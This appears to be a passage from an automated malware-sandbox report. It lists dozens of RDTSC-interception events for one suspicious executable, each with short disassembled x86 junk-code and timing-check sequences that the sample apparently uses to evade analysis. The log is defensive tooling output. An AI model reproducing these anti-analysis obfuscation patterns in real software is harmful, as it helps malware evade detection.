                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51161A second address: 511638 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F4C288D0397h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5118CB second address: 511903 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4C28D8B362h 0x00000008 jmp 00007F4C28D8B35Ch 0x0000000d push esi 0x0000000e ja 00007F4C28D8B356h 0x00000014 jmp 00007F4C28D8B362h 0x00000019 pop esi 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 511A64 second address: 511A6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 511A6A second address: 511A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F4C28D8B356h 0x0000000d jmp 00007F4C28D8B362h 0x00000012 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 511A89 second address: 511AB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0392h 0x00000007 jnl 00007F4C288D0386h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 jbe 00007F4C288D0386h 0x00000018 push edx 0x00000019 pop edx 0x0000001a pop ecx 0x0000001b rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 511AB1 second address: 511ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C28D8B360h 0x00000009 js 00007F4C28D8B356h 0x0000000f rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 511ACB second address: 511ADB instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4C288D0386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 511ADB second address: 511ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 511E27 second address: 511E31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F4C288D0386h 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 511E31 second address: 511E35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 511FD1 second address: 51200A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0391h 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 jmp 00007F4C288D0394h 0x00000015 pushad 0x00000016 jc 00007F4C288D0386h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51228D second address: 512291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 512291 second address: 5122D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F4C288D0386h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F4C288D038Eh 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 push esi 0x00000019 pop esi 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d pushad 0x0000001e pushad 0x0000001f jng 00007F4C288D0386h 0x00000025 pushad 0x00000026 popad 0x00000027 pushad 0x00000028 popad 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c push esi 0x0000002d pushad 0x0000002e popad 0x0000002f pop esi 0x00000030 jg 00007F4C288D038Ch 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5122D2 second address: 5122DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51242D second address: 51244F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4C288D0386h 0x0000000a push eax 0x0000000b jnp 00007F4C288D0386h 0x00000011 jns 00007F4C288D0386h 0x00000017 pop eax 0x00000018 popad 0x00000019 pushad 0x0000001a jl 00007F4C288D038Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51244F second address: 512459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 512459 second address: 51245D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 512B30 second address: 512B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F4C28D8B356h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 512B3C second address: 512B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4C288D0386h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F4C288D0386h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 512CB0 second address: 512CB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5153C6 second address: 5153CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4E439B second address: 4E439F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 518CD3 second address: 518D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jne 00007F4C288D039Ah 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 jne 00007F4C288D038Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b pop esi 0x0000001c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 518D09 second address: 518D20 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4C28D8B356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F4C28D8B358h 0x00000015 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 518D20 second address: 518D47 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F4C288D0390h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 push edx 0x00000011 jnl 00007F4C288D0386h 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 518E38 second address: 518E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C28D8B363h 0x00000009 popad 0x0000000a pop ecx 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 518F56 second address: 518F73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4D5475 second address: 4D547B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4D547B second address: 4D5489 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4C288D0386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4D5489 second address: 4D5493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4C28D8B356h 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4D5493 second address: 4D549D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4D549D second address: 4D54A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4C28D8B356h 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4D54A7 second address: 4D54B3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4D54B3 second address: 4D54D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007F4C28D8B362h 0x00000012 pop edx 0x00000013 pushad 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51CD55 second address: 51CD66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4C288D0386h 0x0000000a jnl 00007F4C288D0386h 0x00000010 popad 0x00000011 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51CD66 second address: 51CD8D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 jmp 00007F4C28D8B35Bh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4C28D8B360h 0x00000016 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51CD8D second address: 51CDA1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4C288D0386h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F4C288D0386h 0x00000014 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51CDA1 second address: 51CDA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51CF2D second address: 51CF4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F4C288D0386h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F4C288D0395h 0x00000011 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51CF4E second address: 51CF54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51CF54 second address: 51CF6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C288D0397h 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51D249 second address: 51D24F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51D24F second address: 51D258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51D61B second address: 51D66C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F4C28D8B360h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007F4C28D8B362h 0x00000011 pop ecx 0x00000012 popad 0x00000013 pushad 0x00000014 jg 00007F4C28D8B35Eh 0x0000001a push ecx 0x0000001b jmp 00007F4C28D8B35Fh 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 pop ecx 0x00000023 push eax 0x00000024 push edx 0x00000025 push ecx 0x00000026 pop ecx 0x00000027 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51D66C second address: 51D670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51D7EB second address: 51D7F5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4C28D8B35Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51D7F5 second address: 51D7FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 520D5E second address: 520D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 520D62 second address: 520DA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0394h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 2790B6CEh 0x00000010 movsx esi, ax 0x00000013 call 00007F4C288D0389h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F4C288D0397h 0x0000001f rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 520DA6 second address: 520DD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B367h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jl 00007F4C28D8B35Ah 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 pushad 0x00000019 js 00007F4C28D8B35Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 520DD9 second address: 520E1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4C288D038Ch 0x0000000a jp 00007F4C288D0386h 0x00000010 popad 0x00000011 mov eax, dword ptr [eax] 0x00000013 jmp 00007F4C288D0396h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c pushad 0x0000001d jmp 00007F4C288D038Ch 0x00000022 push eax 0x00000023 push edx 0x00000024 jno 00007F4C288D0386h 0x0000002a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5212A7 second address: 5212B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F4C28D8B356h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52196B second address: 52197C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jbe 00007F4C288D0386h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5219FD second address: 521A4D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F4C28D8B35Ah 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F4C28D8B358h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 mov edi, ecx 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushad 0x0000002d popad 0x0000002e jmp 00007F4C28D8B369h 0x00000033 popad 0x00000034 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 521A4D second address: 521A53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 521B7C second address: 521B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 521C73 second address: 521C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4C288D0394h 0x0000000c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 521D64 second address: 521D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F4C28D8B35Bh 0x0000000b rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 521FD4 second address: 521FD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 521FD9 second address: 521FF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C28D8B368h 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 521FF5 second address: 52200C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a sub edi, 587B93ACh 0x00000010 pop esi 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52200C second address: 522016 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 522016 second address: 52201A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 525617 second address: 52561C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 527BE1 second address: 527BE6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 525EEA second address: 525EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 525EEE second address: 525EF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 525EF3 second address: 525EF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 528C0F second address: 528C77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0397h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F4C288D0388h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov si, 0BD1h 0x00000028 push 00000000h 0x0000002a mov esi, dword ptr [ebp+122D22CCh] 0x00000030 push 00000000h 0x00000032 sub dword ptr [ebp+122D2486h], eax 0x00000038 xchg eax, ebx 0x00000039 jno 00007F4C288D038Ah 0x0000003f push eax 0x00000040 push ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 ja 00007F4C288D0386h 0x00000049 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 529681 second address: 529695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F4C28D8B35Ch 0x0000000e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 529695 second address: 5296AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C288D0391h 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5296AA second address: 52971E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B360h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F4C28D8B358h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 mov edi, 7A163AAFh 0x0000002b push 00000000h 0x0000002d add dword ptr [ebp+12463680h], ebx 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ecx 0x00000038 call 00007F4C28D8B358h 0x0000003d pop ecx 0x0000003e mov dword ptr [esp+04h], ecx 0x00000042 add dword ptr [esp+04h], 00000018h 0x0000004a inc ecx 0x0000004b push ecx 0x0000004c ret 0x0000004d pop ecx 0x0000004e ret 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jbe 00007F4C28D8B35Ch 0x00000058 jo 00007F4C28D8B356h 0x0000005e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4E933C second address: 4E934A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 jnc 00007F4C288D0386h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52D293 second address: 52D298 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
